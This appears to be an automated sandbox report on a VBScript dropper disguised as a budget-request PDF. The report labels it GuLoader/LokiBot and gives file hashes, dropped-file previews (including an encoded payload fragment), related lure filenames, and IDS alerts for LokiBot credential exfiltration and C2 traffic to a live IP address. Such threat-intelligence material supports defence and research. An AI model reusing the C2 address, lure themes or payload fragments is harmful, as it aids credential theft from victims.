                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
                            renamed because original name is a hash value
                            Original Sample Name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888pdf.vbs
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winVBS@8/10@5/5
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            01:18:21API Interceptor121x Sleep call for process: powershell.exe modified
                            01:19:17API Interceptor24x Sleep call for process: msiexec.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            137.184.191.215Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?id=1
                            Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/039
                            PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/039
                            DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            PANDGUSAj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                            • 155.120.253.229
                            PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0e404.exeGet hashmaliciousUnknownBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 142.250.186.33
                            • 172.217.18.14
                            37f463bf4616ecd445d4a1937da06e19AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            Cn3E2Kp2LP.exeGet hashmaliciousCobaltStrikeBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            Cn3E2Kp2LP.exeGet hashmaliciousCobaltStrikeBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            Version.130.2482.15.jsGet hashmaliciousUnknownBrowse
                            • 172.217.18.110
                            • 142.250.186.161
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Roaming\188E93\31437F.exeSOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                              Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                C7jdH7geD6.exeGet hashmaliciousUnknownBrowse
                                  setup.exeGet hashmaliciousUnknownBrowse
                                    #U67e5#U8be2#U5165#U53e3.exeGet hashmaliciousUnknownBrowse
                                      sample.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulJnp/p:NllU
                                        MD5:BC6DB77EB243BF62DC31267706650173
                                        SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                        SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                        SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e.................................X..............@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):59904
                                        Entropy (8bit):5.770776695007155
                                        Encrypted:false
                                        SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                        MD5:9D09DC1EDA745A5F87553048E57620CF
                                        SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                        SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                        SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Joe Sandbox View:
                                        • Filename: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
                                        • Filename: Bnnebgers.vbs, Detection: malicious, Browse
                                        • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                        • Filename: setup.exe, Detection: malicious, Browse
                                        • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                        • Filename: sample.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):1.0424600748477153
                                        Encrypted:false
                                        SSDEEP:3:/lbq:4
                                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                        Malicious:false
                                        Preview:........................................user.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):468128
                                        Entropy (8bit):5.964340705901803
                                        Encrypted:false
                                        SSDEEP:12288:lPtCGsaVQ7AMDbqPudZ/tQMJksdTL3SiG:2Awb1mM53jG
                                        MD5:D4C256A39EBB62A0AE88C5DFAF3DE765
                                        SHA1:437D4EFB2D6F5650F9927CC930B6A34AA46E3A54
                                        SHA-256:6244FB691D281B1C43C443E20B1DEB12E3A4F85E45993D37C97B9C968977D1B4
                                        SHA-512:6A2240302A45C0F32B6EF44E21FC577E2B1908136568BBCC3112F35341C48D00A7938292483FF5BBBC20F2638528955E73A4BAF5D4FE3CF9D4175BC010FF401F
                                        Malicious:false
                                        Preview:cQGb6wKAiLsZWQoA6wKxi3EBmwNcJATrAmuD6wKN2bkNCmBy6wIDGesCJTqB8UDEWoRxAZvrArAFgfFNzjr26wIyXnEBm+sCIHjrAuscuj5gNGnrAmh3cQGb6wI6OnEBmzHKcQGb6wKgMIkUC3EBm+sClTbR4nEBm3EBm4PBBHEBm+sC0L6B+aepFQF8zOsCQxBxAZuLRCQE6wJw+nEBm4nD6wKlWHEBm4HD+OeDAHEBm3EBm7oHsABrcQGb6wI34IHyfGTrv3EBm3EBm4HChSsUK+sCUwtxAZtxAZvrAonB6wJGyOsCcZOLDBDrAklfcQGbiQwT6wI32OsC9klC6wLOM+sCQsuB+gjfBAB10usCYXpxAZuJXCQM6wKWS3EBm4HtAAMAAOsCdSXrAsjzi1QkCHEBm+sCMx+LfCQE6wIoSnEBm4nrcQGb6wJUOoHDnAAAAHEBm+sCTfdTcQGbcQGbakBxAZvrAhzSievrAkhWcQGbx4MAAQAAABAjAXEBm+sCqKGBwwABAABxAZtxAZtTcQGb6wIjUInrcQGb6wLTA4m7BAEAAHEBm3EBm4HDBAEAAHEBm+sCw+RT6wITxusC05Vq/3EBm3EBm4PCBesCpGXrAgPNMfZxAZtxAZsxyXEBm3EBm4sa6wLKRXEBm0FxAZtxAZs5HAp19OsCEMhxAZtG6wJfKusChu6AfAr7uHXd6wI7a+sClCWLRAr8cQGbcQGbKfBxAZtxAZv/0usCD4XrAoV2ugjfBADrAlwa6wLenzHA6wK7fusC942LfCQM6wLZROsCfyeBNAf2xIq8cQGb6wLsuIPABOsChEbrAqeROdB14+sC72lxAZuJ+3EBm3EBm//X6wJ6r3EBm84hs39/IQMB3zt1Q0kOVllDRWWazpWYPQH5cGMARWUlrY/flQpPN5UJO3XpfyEzfSdQgDwMmwtNFPqSCXcFbba7jwtN5D5Ttl8dvvS9A86x9o1VeCVF/rH2iF8Fbfx9
                                        File type:ASCII text, with CRLF line terminators
                                        Entropy (8bit):4.858420781526879
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
                                        File size:74'212 bytes
                                        MD5:cf3ce0d565b919fe45d02705736fe824
                                        SHA1:0924076c6434b432b18fd0b298a2b5b14e38b754
                                        SHA256:96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f
                                        SHA512:eb44246e1c25d9cfcb49f724f710b21432fb8fab17b1344c3af142ef5959542a01db052db1e02b8f9af1df07872d3508fa99718a95260440b450bcee035fc431
                                        SSDEEP:1536:sTgvWHbK7HAM/TkMCV5i+8Q5+h+4C/hNGweE+f:sTgeMAITO8QS+lkf
                                        TLSH:09732931F9D706F68D4222FCE9416F0587B9BE182315C0ECA5B9C68A18D14DF8EBB2D5
                                        File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                                        Icon Hash:68d69b8f86ab9a86
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-02T07:19:05.174518+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.459082172.217.18.110443TCP
                                        2024-10-02T07:19:09.572345+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459084137.184.191.21580TCP
                                        2024-10-02T07:19:09.572345+02002025381ET MALWARE LokiBot Checkin1192.168.2.459084137.184.191.21580TCP
                                        2024-10-02T07:19:12.302852+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.459084137.184.191.21580TCP
                                        2024-10-02T07:19:12.483647+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459085137.184.191.21580TCP
                                        2024-10-02T07:19:12.483647+02002025381ET MALWARE LokiBot Checkin1192.168.2.459085137.184.191.21580TCP
                                        2024-10-02T07:19:15.447618+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.459085137.184.191.21580TCP
                                        2024-10-02T07:19:15.529974+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459086137.184.191.21580TCP
                                        2024-10-02T07:19:15.529974+02002025381ET MALWARE LokiBot Checkin1192.168.2.459086137.184.191.21580TCP
                                        2024-10-02T07:19:18.171666+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459086137.184.191.21580TCP
                                        2024-10-02T07:19:18.171666+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459086137.184.191.21580TCP
                                        2024-10-02T07:19:18.355471+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459087137.184.191.21580TCP
                                        2024-10-02T07:19:18.355471+02002025381ET MALWARE LokiBot Checkin1192.168.2.459087137.184.191.21580TCP
                                        2024-10-02T07:19:21.013032+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459087137.184.191.21580TCP
                                        2024-10-02T07:19:21.013032+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459087137.184.191.21580TCP
                                        2024-10-02T07:19:21.251872+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459088137.184.191.21580TCP
                                        2024-10-02T07:19:21.251872+02002025381ET MALWARE LokiBot Checkin1192.168.2.459088137.184.191.21580TCP
                                        2024-10-02T07:19:23.973964+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459088137.184.191.21580TCP
                                        2024-10-02T07:19:23.973964+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459088137.184.191.21580TCP
                                        2024-10-02T07:19:24.164842+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459089137.184.191.21580TCP
                                        2024-10-02T07:19:24.164842+02002025381ET MALWARE LokiBot Checkin1192.168.2.459089137.184.191.21580TCP
                                        2024-10-02T07:19:27.548269+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459089137.184.191.21580TCP
                                        2024-10-02T07:19:27.548269+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459089137.184.191.21580TCP
                                        2024-10-02T07:19:27.707362+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459090137.184.191.21580TCP
                                        2024-10-02T07:19:27.707362+02002025381ET MALWARE LokiBot Checkin1192.168.2.459090137.184.191.21580TCP
                                        2024-10-02T07:19:30.379725+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459090137.184.191.21580TCP
                                        2024-10-02T07:19:30.379725+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459090137.184.191.21580TCP
                                        2024-10-02T07:19:30.551427+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459091137.184.191.21580TCP
                                        2024-10-02T07:19:30.551427+02002025381ET MALWARE LokiBot Checkin1192.168.2.459091137.184.191.21580TCP
                                        2024-10-02T07:19:33.225029+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459091137.184.191.21580TCP
                                        2024-10-02T07:19:33.225029+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459091137.184.191.21580TCP
                                        2024-10-02T07:19:33.393218+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459092137.184.191.21580TCP
                                        2024-10-02T07:19:33.393218+02002025381ET MALWARE LokiBot Checkin1192.168.2.459092137.184.191.21580TCP
                                        2024-10-02T07:19:36.057069+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459092137.184.191.21580TCP
                                        2024-10-02T07:19:36.057069+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459092137.184.191.21580TCP
                                        2024-10-02T07:19:36.220072+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459093137.184.191.21580TCP
                                        2024-10-02T07:19:36.220072+02002025381ET MALWARE LokiBot Checkin1192.168.2.459093137.184.191.21580TCP
                                        2024-10-02T07:19:38.828485+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459093137.184.191.21580TCP
                                        2024-10-02T07:19:38.828485+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459093137.184.191.21580TCP
                                        2024-10-02T07:19:38.975579+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459094137.184.191.21580TCP
                                        2024-10-02T07:19:38.975579+02002025381ET MALWARE LokiBot Checkin1192.168.2.459094137.184.191.21580TCP
                                        2024-10-02T07:19:41.576277+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459094137.184.191.21580TCP
                                        2024-10-02T07:19:41.576277+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459094137.184.191.21580TCP
                                        2024-10-02T07:19:41.723886+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459095137.184.191.21580TCP
                                        2024-10-02T07:19:41.723886+02002025381ET MALWARE LokiBot Checkin1192.168.2.459095137.184.191.21580TCP
                                        2024-10-02T07:19:44.444483+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459095137.184.191.21580TCP
                                        2024-10-02T07:19:44.444483+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459095137.184.191.21580TCP
                                        2024-10-02T07:19:44.604525+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459096137.184.191.21580TCP
                                        2024-10-02T07:19:44.604525+02002025381ET MALWARE LokiBot Checkin1192.168.2.459096137.184.191.21580TCP
                                        2024-10-02T07:19:47.324761+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459096137.184.191.21580TCP
                                        2024-10-02T07:19:47.324761+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459096137.184.191.21580TCP
                                        2024-10-02T07:19:47.483919+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459097137.184.191.21580TCP
                                        2024-10-02T07:19:47.483919+02002025381ET MALWARE LokiBot Checkin1192.168.2.459097137.184.191.21580TCP
                                        2024-10-02T07:19:49.999462+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459097137.184.191.21580TCP
                                        2024-10-02T07:19:49.999462+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459097137.184.191.21580TCP
                                        2024-10-02T07:19:50.178821+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459098137.184.191.21580TCP
                                        2024-10-02T07:19:50.178821+02002025381ET MALWARE LokiBot Checkin1192.168.2.459098137.184.191.21580TCP
                                        2024-10-02T07:19:53.439974+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459098137.184.191.21580TCP
                                        2024-10-02T07:19:53.439974+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459098137.184.191.21580TCP
                                        2024-10-02T07:19:53.593930+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459099137.184.191.21580TCP
                                        2024-10-02T07:19:53.593930+02002025381ET MALWARE LokiBot Checkin1192.168.2.459099137.184.191.21580TCP
                                        2024-10-02T07:19:56.226080+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.459099137.184.191.21580TCP
                                        2024-10-02T07:19:56.226080+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.459099137.184.191.21580TCP
                                        2024-10-02T07:19:56.379219+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.459100137.184.191.21580TCP
                                        2024-10-02T07:19:56.379219+02002025381ET MALWARE LokiBot Checkin1192.168.2.459100137.184.191.21580TCP
